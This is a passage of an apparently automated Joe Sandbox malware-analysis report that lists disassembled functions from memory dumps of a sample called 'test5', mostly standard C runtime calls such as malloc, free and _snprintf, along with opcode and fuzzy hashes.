Part of subcall function 000002155375F013: _getptd_noexit.LIBCMT ref: 000002155375F017

_errno.LIBCMT ref: 000002155375F6E0
_isatty.LIBCMT ref: 000002155375F741
_getbuf.LIBCMT ref: 000002155375F74D

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: _errno$_fileno_getbuf_getptd_noexit_invalid_parameter_noinfo_isatty
String ID:
API String ID: 304646821-0
Opcode ID: 872796ac68f0a2c990ec7574be4b8262460ebf94b78f5d760dc63ea6db356553
Instruction ID: 0dc7066f60ea6f86c51365d671245f708d27ed6dcacdd3e49639e510b2a859da
Opcode Fuzzy Hash: 872796ac68f0a2c990ec7574be4b8262460ebf94b78f5d760dc63ea6db356553
Instruction Fuzzy Hash: C551C030924E28DFEBDC9F28C4997A737D2EBA8310F940599D46ECB2D6D674CA4187D0

Function 0000021551C0780C Relevance: 7.6, APIs: 6, Instructions: 142COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000021551C0783B

Part of subcall function 0000021551C0D1C8: _FF_MSGBANNER.LIBCMT ref: 0000021551C0D1F8
Part of subcall function 0000021551C0D1C8: _NMSG_WRITE.LIBCMT ref: 0000021551C0D202
Part of subcall function 0000021551C0D1C8: _callnewh.LIBCMT ref: 0000021551C0D236
Part of subcall function 0000021551C0D1C8: _errno.LIBCMT ref: 0000021551C0D241
Part of subcall function 0000021551C0D1C8: _errno.LIBCMT ref: 0000021551C0D24C

_snprintf.LIBCMT ref: 0000021551C07853

Part of subcall function 0000021551C0D57C: _errno.LIBCMT ref: 0000021551C0D5B3
Part of subcall function 0000021551C0D57C: _invalid_parameter_noinfo.LIBCMT ref: 0000021551C0D5BE

free.LIBCMT ref: 0000021551C0786A

Part of subcall function 0000021551C0D188: RtlFreeHeap.NTDLL ref: 0000021551C0D19E
Part of subcall function 0000021551C0D188: _errno.LIBCMT ref: 0000021551C0D1A8

malloc.LIBCMT ref: 0000021551C078BA
_snprintf.LIBCMT ref: 0000021551C078D2
free.LIBCMT ref: 0000021551C078FA

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: _errno$_snprintffreemalloc$FreeHeap_callnewh_invalid_parameter_noinfo
String ID:
API String ID: 343393124-0
Opcode ID: 6a658e466ab6b8aceff6db9366090ada30c858ea3a03489b9340fb8c77b34acf
Instruction ID: 7c2d2bd455bd7b4f6fc56b9dc9d160788150466f1b451309b5a7a33738757b40
Opcode Fuzzy Hash: 6a658e466ab6b8aceff6db9366090ada30c858ea3a03489b9340fb8c77b34acf
Instruction Fuzzy Hash: C241823071CE585FE699B73CA4593F87BD2E7D9310F944299D0CEC3296DD25AC428B81

Function 0000021553756C53 Relevance: 7.6, APIs: 6, Instructions: 142COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000021553756C82

Part of subcall function 000002155375C60F: _FF_MSGBANNER.LIBCMT ref: 000002155375C63F
Part of subcall function 000002155375C60F: _NMSG_WRITE.LIBCMT ref: 000002155375C649
Part of subcall function 000002155375C60F: _callnewh.LIBCMT ref: 000002155375C67D
Part of subcall function 000002155375C60F: _errno.LIBCMT ref: 000002155375C688
Part of subcall function 000002155375C60F: _errno.LIBCMT ref: 000002155375C693

_snprintf.LIBCMT ref: 0000021553756C9A

Part of subcall function 000002155375C9C3: _errno.LIBCMT ref: 000002155375C9FA
Part of subcall function 000002155375C9C3: _invalid_parameter_noinfo.LIBCMT ref: 000002155375CA05

free.LIBCMT ref: 0000021553756CB1

Part of subcall function 000002155375C5CF: _errno.LIBCMT ref: 000002155375C5EF

malloc.LIBCMT ref: 0000021553756D01
_snprintf.LIBCMT ref: 0000021553756D19
free.LIBCMT ref: 0000021553756D41

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
String ID:
API String ID: 761449704-0
Opcode ID: 6a658e466ab6b8aceff6db9366090ada30c858ea3a03489b9340fb8c77b34acf
Instruction ID: 19a67797d0d4d42a93d685f4cbe1fbff66421e9fe9d1af770671d6bac4234f3b
Opcode Fuzzy Hash: 6a658e466ab6b8aceff6db9366090ada30c858ea3a03489b9340fb8c77b34acf
Instruction Fuzzy Hash: BC41B130B1CE585FEA9CAB2C64193F977D2E7D9310F845299D08ED3296DE249E0287C5

Function 0000021551BFF89C Relevance: 7.6, APIs: 5, Instructions: 90fileCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000021551BFF8BD

Part of subcall function 0000021551C0D1C8: _FF_MSGBANNER.LIBCMT ref: 0000021551C0D1F8
Part of subcall function 0000021551C0D1C8: _NMSG_WRITE.LIBCMT ref: 0000021551C0D202
Part of subcall function 0000021551C0D1C8: _callnewh.LIBCMT ref: 0000021551C0D236
Part of subcall function 0000021551C0D1C8: _errno.LIBCMT ref: 0000021551C0D241
Part of subcall function 0000021551C0D1C8: _errno.LIBCMT ref: 0000021551C0D24C

free.LIBCMT ref: 0000021551BFF8F8
fwrite.LIBCMT ref: 0000021551BFF939
fclose.LIBCMT ref: 0000021551BFF941
free.LIBCMT ref: 0000021551BFF94E

Part of subcall function 0000021551C0D188: RtlFreeHeap.NTDLL ref: 0000021551C0D19E
Part of subcall function 0000021551C0D188: _errno.LIBCMT ref: 0000021551C0D1A8

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: _errno$free$FreeHeap_callnewhfclosefwritemalloc
String ID:
API String ID: 415550720-0
Opcode ID: 7f55edad75ff0bbfcf874ce00c2e3ecc23b72eec22338907bae6ad7bfe5dc563
Instruction ID: e3bc8df0e491ae991211a5e0382c7398e29416b0bffc5c3e7d93574f2214a5be
Opcode Fuzzy Hash: 7f55edad75ff0bbfcf874ce00c2e3ecc23b72eec22338907bae6ad7bfe5dc563
Instruction Fuzzy Hash: 9321A731628E68ABE744F77884983EE76D2F7E8310FD4059DA04AC32C6DD25DD418741

Function 000002155374ECE3 Relevance: 7.6, APIs: 5, Instructions: 90fileCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 000002155374ED04

Part of subcall function 000002155375C60F: _FF_MSGBANNER.LIBCMT ref: 000002155375C63F
Part of subcall function 000002155375C60F: _NMSG_WRITE.LIBCMT ref: 000002155375C649
Part of subcall function 000002155375C60F: _callnewh.LIBCMT ref: 000002155375C67D
Part of subcall function 000002155375C60F: _errno.LIBCMT ref: 000002155375C688
Part of subcall function 000002155375C60F: _errno.LIBCMT ref: 000002155375C693

free.LIBCMT ref: 000002155374ED3F
fwrite.LIBCMT ref: 000002155374ED80
fclose.LIBCMT ref: 000002155374ED88
free.LIBCMT ref: 000002155374ED95

Part of subcall function 000002155375C5CF: _errno.LIBCMT ref: 000002155375C5EF

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: _errno$free$_callnewhfclosefwritemalloc
String ID:
API String ID: 1696598829-0
Opcode ID: 7f55edad75ff0bbfcf874ce00c2e3ecc23b72eec22338907bae6ad7bfe5dc563
Instruction ID: 26f4f23d119e8d64108b044d3c6d8ede71e312a9223d6bb927fa7d4adb1624f0
Opcode Fuzzy Hash: 7f55edad75ff0bbfcf874ce00c2e3ecc23b72eec22338907bae6ad7bfe5dc563
Instruction Fuzzy Hash: B421B730A34E189BE6C8F76854597DB71D2F7E8310F84059DA04ED32C2DD249B014786

Function 0000021551C184AC Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000021551C184BD

Part of subcall function 0000021551C0FBCC: _getptd_noexit.LIBCMT ref: 0000021551C0FBD0

__doserrno.LIBCMT ref: 0000021551C184B5

Part of subcall function 0000021551C0FB5C: _getptd_noexit.LIBCMT ref: 0000021551C0FB60

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno_errno
String ID:
API String ID: 2964073243-0
Opcode ID: bd3ba21443fd0c50c0a4bf83960b1fd102cab18f9fc9d7b57dd34df66812a4b6
Instruction ID: 601875d50f14001d480b4ea797438fb6e8e91912f65ecb7da8619c95ca775d2a
Opcode Fuzzy Hash: bd3ba21443fd0c50c0a4bf83960b1fd102cab18f9fc9d7b57dd34df66812a4b6
Instruction Fuzzy Hash: 48018F701D8D25EFE215A768C8A93D83E92EBB1325FD042C8D00AC71D2DB7E18818A52

Function 00000215537678F3 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000021553767904

Part of subcall function 000002155375F013: _getptd_noexit.LIBCMT ref: 000002155375F017

__doserrno.LIBCMT ref: 00000215537678FC

Part of subcall function 000002155375EFA3: _getptd_noexit.LIBCMT ref: 000002155375EFA7

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno_errno
String ID:
API String ID: 2964073243-0
Opcode ID: bd3ba21443fd0c50c0a4bf83960b1fd102cab18f9fc9d7b57dd34df66812a4b6
Instruction ID: 8d74b7cca462ef9dd2edd194b82586a80dee349c6494a049fbbc3039152c0a03
Opcode Fuzzy Hash: bd3ba21443fd0c50c0a4bf83960b1fd102cab18f9fc9d7b57dd34df66812a4b6
Instruction Fuzzy Hash: B401D630D35E69EFF2E9A72488A97D632D2EBB1365FD442D4D01DCB1E6DB78054082A1

Function 0000021551C0CF70 Relevance: 6.3, APIs: 5, Instructions: 76COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000021551C0CF93

Part of subcall function 0000021551C0D1C8: _FF_MSGBANNER.LIBCMT ref: 0000021551C0D1F8
Part of subcall function 0000021551C0D1C8: _NMSG_WRITE.LIBCMT ref: 0000021551C0D202
Part of subcall function 0000021551C0D1C8: _callnewh.LIBCMT ref: 0000021551C0D236
Part of subcall function 0000021551C0D1C8: _errno.LIBCMT ref: 0000021551C0D241
Part of subcall function 0000021551C0D1C8: _errno.LIBCMT ref: 0000021551C0D24C

malloc.LIBCMT ref: 0000021551C0CFA1

Part of subcall function 0000021551C0D1C8: _callnewh.LIBCMT ref: 0000021551C0D25C
Part of subcall function 0000021551C0D1C8: _errno.LIBCMT ref: 0000021551C0D261

malloc.LIBCMT ref: 0000021551C0CFC3
_snprintf.LIBCMT ref: 0000021551C0CFDE

Part of subcall function 0000021551C0D57C: _errno.LIBCMT ref: 0000021551C0D5B3
Part of subcall function 0000021551C0D57C: _invalid_parameter_noinfo.LIBCMT ref: 0000021551C0D5BE

malloc.LIBCMT ref: 0000021551C0CFF9

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
String ID:
API String ID: 2026495703-0
Opcode ID: 517d69768db3b6bf3d395ac3c09d0a903cb9471390505f3454a2c5542d334632
Instruction ID: ebe6cad037cec19b93b79714efddf4ee00b75b2f3a0428797fa592f1bde6c105
Opcode Fuzzy Hash: 517d69768db3b6bf3d395ac3c09d0a903cb9471390505f3454a2c5542d334632
Instruction Fuzzy Hash: 7F115174A1CF185FE798EB7CA4853A97AD2F79C320F50459EE04AC3296DA34AC414BC5

Function 000002155375C3B7 Relevance: 6.3, APIs: 5, Instructions: 76COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 000002155375C3DA

Part of subcall function 000002155375C60F: _FF_MSGBANNER.LIBCMT ref: 000002155375C63F
Part of subcall function 000002155375C60F: _NMSG_WRITE.LIBCMT ref: 000002155375C649
Part of subcall function 000002155375C60F: _callnewh.LIBCMT ref: 000002155375C67D
Part of subcall function 000002155375C60F: _errno.LIBCMT ref: 000002155375C688
Part of subcall function 000002155375C60F: _errno.LIBCMT ref: 000002155375C693

malloc.LIBCMT ref: 000002155375C3E8

Part of subcall function 000002155375C60F: _callnewh.LIBCMT ref: 000002155375C6A3
Part of subcall function 000002155375C60F: _errno.LIBCMT ref: 000002155375C6A8

malloc.LIBCMT ref: 000002155375C40A
_snprintf.LIBCMT ref: 000002155375C425

Part of subcall function 000002155375C9C3: _errno.LIBCMT ref: 000002155375C9FA
Part of subcall function 000002155375C9C3: _invalid_parameter_noinfo.LIBCMT ref: 000002155375CA05

malloc.LIBCMT ref: 000002155375C440

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
String ID:
API String ID: 2026495703-0
Opcode ID: 517d69768db3b6bf3d395ac3c09d0a903cb9471390505f3454a2c5542d334632
Instruction ID: 143d83ff2da81fdd97e7d8d0ab3aaeee7798035e589d4b68b2ab23f43d307ed5
Opcode Fuzzy Hash: 517d69768db3b6bf3d395ac3c09d0a903cb9471390505f3454a2c5542d334632
Instruction Fuzzy Hash: A3117F30A2DF155FE798EB68A4493A676D2F798310F50459EE04EC3296EA349A4187C2

Function 0000021551C0E56C Relevance: 6.2, APIs: 4, Instructions: 194COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000021551C0E5A4

Part of subcall function 0000021551C0FBCC: _getptd_noexit.LIBCMT ref: 0000021551C0FBD0

_invalid_parameter_noinfo.LIBCMT ref: 0000021551C0E5AF
_flush.LIBCMT ref: 0000021551C0E661
_fileno.LIBCMT ref: 0000021551C0E682

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: _errno_fileno_flush_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 634798775-0
Opcode ID: b2a8dbbb867a594f76b04f7a59aae2ecf5df5d729cd9875792cf73ff4dabdb8d
Instruction ID: 2f22bbae42e1b10a23c54e6230a4fa42d7c80f9f004dd66ca6039fab29f2baeb
Opcode Fuzzy Hash: b2a8dbbb867a594f76b04f7a59aae2ecf5df5d729cd9875792cf73ff4dabdb8d
Instruction Fuzzy Hash: 66515130258F2D9BE668597DE8CD3B97BC2E7F5310F5402ADD459C31D2F952EC824982

Function 000002155375D9B3 Relevance: 6.2, APIs: 4, Instructions: 194COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000002155375D9EB

Part of subcall function 000002155375F013: _getptd_noexit.LIBCMT ref: 000002155375F017

_invalid_parameter_noinfo.LIBCMT ref: 000002155375D9F6
_flush.LIBCMT ref: 000002155375DAA8
_fileno.LIBCMT ref: 000002155375DAC9

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: _errno_fileno_flush_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 634798775-0
Opcode ID: b2a8dbbb867a594f76b04f7a59aae2ecf5df5d729cd9875792cf73ff4dabdb8d
Instruction ID: e4e4157b20e97a7d60fd3cbd18fa455cfe3406d1a9e582158be44bf2701a909d
Opcode Fuzzy Hash: b2a8dbbb867a594f76b04f7a59aae2ecf5df5d729cd9875792cf73ff4dabdb8d
Instruction Fuzzy Hash: 2851FB30A28F199BE7EC5A5D549D3B732C2E7E4310F5402AED45EC31E6EAA0DE4385C5

Function 0000021551BF10D0 Relevance: 6.1, APIs: 4, Instructions: 90COMMONLIBRARYCODE

Download Yara Rule

APIs

clock.LIBCMT ref: 0000021551BF1117
clock.LIBCMT ref: 0000021551BF1124
clock.LIBCMT ref: 0000021551BF112D
clock.LIBCMT ref: 0000021551BF113A

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: clock
String ID:
API String ID: 3195780754-0
Opcode ID: be8aec6b4dea647665e05a79d7238111acf2a2e9d648eaac77e3af4f201da4c7
Instruction ID: 302b46e15ca0afbbc21ca6a2d5af408ca377e1ca329faef0b62b89cfef606f21
Opcode Fuzzy Hash: be8aec6b4dea647665e05a79d7238111acf2a2e9d648eaac77e3af4f201da4c7
Instruction Fuzzy Hash: 97215B7140CB289EE778AD9990CA3B6BBC1E7E5360F150A6DE886C3143E5518D4286C6

Function 0000021553740517 Relevance: 6.1, APIs: 4, Instructions: 90COMMONLIBRARYCODE

Download Yara Rule

APIs

clock.LIBCMT ref: 000002155374055E
clock.LIBCMT ref: 000002155374056B
clock.LIBCMT ref: 0000021553740574
clock.LIBCMT ref: 0000021553740581

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: clock
String ID:
API String ID: 3195780754-0
Opcode ID: be8aec6b4dea647665e05a79d7238111acf2a2e9d648eaac77e3af4f201da4c7
Instruction ID: 7599ef8dd08abe194cc92fb2ae91e4ad6c00ba0845d292499315d369463d187d
Opcode Fuzzy Hash: be8aec6b4dea647665e05a79d7238111acf2a2e9d648eaac77e3af4f201da4c7
Instruction Fuzzy Hash: 41213BB1C1CB28AFEBB8A9DC504ABB7FAD1E7E5350F11026DE4CE83153E550AD4246C2

Function 000002155375D473 Relevance: 6.1, APIs: 4, Instructions: 64COMMONLIBRARYCODE

Download Yara Rule

APIs

_IsNonwritableInCurrentImage.LIBCMT ref: 000002155375D490

Part of subcall function 0000021553761847: _FindPESection.LIBCMT ref: 0000021553761870

_initp_misc_cfltcvt_tab.LIBCMT ref: 000002155375D4A1
_initterm_e.LIBCMT ref: 000002155375D4B4
_IsNonwritableInCurrentImage.LIBCMT ref: 000002155375D4FD

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
String ID:
API String ID: 1991439119-0
Opcode ID: d0aacdeab6c747e7db722564a7347f1053155731eb9de77eec07b84fb13a130c
Instruction ID: 79dec47b92fa77cdc7d3212697be0dc563ed2528074a9be95e30a169fda52c58
Opcode Fuzzy Hash: d0aacdeab6c747e7db722564a7347f1053155731eb9de77eec07b84fb13a130c
Instruction Fuzzy Hash: 8B11C430524E28EBFB9AEF64DCDD7DB73A6E7A4301F840569940AC20E1DE389B44C684

Function 0000021551C0A328 Relevance: 5.4, APIs: 4, Instructions: 378COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000021551C0A39B
malloc.LIBCMT ref: 0000021551C0A5BF
malloc.LIBCMT ref: 0000021551C0A6BD

Part of subcall function 0000021551C0F670: _getptd.LIBCMT ref: 0000021551C0F68F

free.LIBCMT ref: 0000021551C0A6A5

Part of subcall function 0000021551C0D188: RtlFreeHeap.NTDLL ref: 0000021551C0D19E
Part of subcall function 0000021551C0D188: _errno.LIBCMT ref: 0000021551C0D1A8

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: malloc$FreeHeap_errno_getptdfree
String ID:
API String ID: 3311824342-0
Opcode ID: 4061ae52bcfc7ad85d2a69f0cdb15219ba76c7abfce3d0773e5d20170cf697d4
Instruction ID: 0a5ea394be55af7a83db43d95b38838a8a8d914b59dc02e4e3bdcee112313254
Opcode Fuzzy Hash: 4061ae52bcfc7ad85d2a69f0cdb15219ba76c7abfce3d0773e5d20170cf697d4
Instruction Fuzzy Hash: 2FC1D630525E14DFF759DB78E8993F937E6F7A9310F80016AD446C32A1DA39E8428F81

Function 000002155375976F Relevance: 5.4, APIs: 4, Instructions: 378COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 00000215537597E2
malloc.LIBCMT ref: 0000021553759A06
malloc.LIBCMT ref: 0000021553759B04

Part of subcall function 000002155375EAB7: _getptd.LIBCMT ref: 000002155375EAD6

free.LIBCMT ref: 0000021553759AEC

Part of subcall function 000002155375C5CF: _errno.LIBCMT ref: 000002155375C5EF

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: malloc$_errno_getptdfree
String ID:
API String ID: 3172138858-0
Opcode ID: 4061ae52bcfc7ad85d2a69f0cdb15219ba76c7abfce3d0773e5d20170cf697d4
Instruction ID: 469edc265bcbcabe4e8eaa49735b03dbff4e1c939f6c49c464102c95e3b99516
Opcode Fuzzy Hash: 4061ae52bcfc7ad85d2a69f0cdb15219ba76c7abfce3d0773e5d20170cf697d4
Instruction Fuzzy Hash: 0EC1B230935E14DFF79EEB28A8957F633E6F7A9310F90016AD05AC31A1D73899428BC1

Function 0000021551C0D7A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000021551C0D7F1

Part of subcall function 0000021551C0FBCC: _getptd_noexit.LIBCMT ref: 0000021551C0FBD0

_invalid_parameter_noinfo.LIBCMT ref: 0000021551C0D7FC

Strings

B, xrefs: 0000021551C0D828

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: _errno_getptd_noexit_invalid_parameter_noinfo
String ID: B
API String ID: 1812809483-1255198513
Opcode ID: 2c72a65e8919c74c162f480cc61078f9dda1c8fd597633d86c76d95db5f8aa2c
Instruction ID: c3314a7a3f11356384e1bc233d8bbddd47f2837916cb90edd78b2862b1aa2203
Opcode Fuzzy Hash: 2c72a65e8919c74c162f480cc61078f9dda1c8fd597633d86c76d95db5f8aa2c
Instruction Fuzzy Hash: D2116334118F489FD754EB58D4897A97AD2F7A8324F50479EA05DC3291CA74D944CB82

Function 000002155375CBE7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000002155375CC38

Part of subcall function 000002155375F013: _getptd_noexit.LIBCMT ref: 000002155375F017

_invalid_parameter_noinfo.LIBCMT ref: 000002155375CC43

Strings

B, xrefs: 000002155375CC6F

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: _errno_getptd_noexit_invalid_parameter_noinfo
String ID: B
API String ID: 1812809483-1255198513
Opcode ID: 2c72a65e8919c74c162f480cc61078f9dda1c8fd597633d86c76d95db5f8aa2c
Instruction ID: c3a88227027532db6e5b188a49e9a36e032ac5604ee19abd3cdd6997780a88f9
Opcode Fuzzy Hash: 2c72a65e8919c74c162f480cc61078f9dda1c8fd597633d86c76d95db5f8aa2c
Instruction Fuzzy Hash: F0119330528F088FD758EB18944979673D2F7A8324F5046AEA01DC32A1CA74C944C7C2

Function 0000021551C09314 Relevance: 5.2, APIs: 4, Instructions: 226COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000021551C09348

Part of subcall function 0000021551C0D1C8: _FF_MSGBANNER.LIBCMT ref: 0000021551C0D1F8
Part of subcall function 0000021551C0D1C8: _NMSG_WRITE.LIBCMT ref: 0000021551C0D202
Part of subcall function 0000021551C0D1C8: _callnewh.LIBCMT ref: 0000021551C0D236
Part of subcall function 0000021551C0D1C8: _errno.LIBCMT ref: 0000021551C0D241
Part of subcall function 0000021551C0D1C8: _errno.LIBCMT ref: 0000021551C0D24C

free.LIBCMT ref: 0000021551C0948F
free.LIBCMT ref: 0000021551C094F3
free.LIBCMT ref: 0000021551C094FF

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: 39c475a2e60a0baff3062b371bd71c5d934258105383fc1888260d0083121c2a
Instruction ID: 62a464b86d1f7914733fb8bda4534a3e580f323fc93a61b2a7328179d6a06a98
Opcode Fuzzy Hash: 39c475a2e60a0baff3062b371bd71c5d934258105383fc1888260d0083121c2a
Instruction Fuzzy Hash: 1761CA30208D289BE758AB38D4D97FD77D2F7E4710F900A9DE45BC71C3DE26A9468A81

Function 000002155375875B Relevance: 5.2, APIs: 4, Instructions: 226COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 000002155375878F

Part of subcall function 000002155375C60F: _FF_MSGBANNER.LIBCMT ref: 000002155375C63F
Part of subcall function 000002155375C60F: _NMSG_WRITE.LIBCMT ref: 000002155375C649
Part of subcall function 000002155375C60F: _callnewh.LIBCMT ref: 000002155375C67D
Part of subcall function 000002155375C60F: _errno.LIBCMT ref: 000002155375C688
Part of subcall function 000002155375C60F: _errno.LIBCMT ref: 000002155375C693

free.LIBCMT ref: 00000215537588D6
free.LIBCMT ref: 000002155375893A
free.LIBCMT ref: 0000021553758946

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: 39c475a2e60a0baff3062b371bd71c5d934258105383fc1888260d0083121c2a
Instruction ID: b8b88469c261ca358194e341213851d713980e36a12b1bdbbee03d2d6375dcca
Opcode Fuzzy Hash: 39c475a2e60a0baff3062b371bd71c5d934258105383fc1888260d0083121c2a
Instruction Fuzzy Hash: 8C618631B24D29ABEA9DEB2894597EE72D3F7E4310F94095DE44EC31D2DF249A0246C2

Function 0000021551BFE8D8 Relevance: 5.2, APIs: 4, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 0000021551BFE975

Part of subcall function 0000021551C0D57C: _errno.LIBCMT ref: 0000021551C0D5B3
Part of subcall function 0000021551C0D57C: _invalid_parameter_noinfo.LIBCMT ref: 0000021551C0D5BE

_snprintf.LIBCMT ref: 0000021551BFE991
_snprintf.LIBCMT ref: 0000021551BFEA07
_snprintf.LIBCMT ref: 0000021551BFEA1E

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: _snprintf$_errno_invalid_parameter_noinfo
String ID:
API String ID: 3442832105-0
Opcode ID: af8750bcd6550084eb4a2dd99c9bacf52ff47d8f7bcb806aa8302d3e1bf097e4
Instruction ID: d590ecf21178e5fcb11eb0f8ffd9ddfb55752ffe9d61ac527c0a5b402514c894
Opcode Fuzzy Hash: af8750bcd6550084eb4a2dd99c9bacf52ff47d8f7bcb806aa8302d3e1bf097e4
Instruction Fuzzy Hash: 9E61B434518E588FEB54EF28D8897EAB7E6FBE8300F5005A9E44AC3192DF35E945CB41

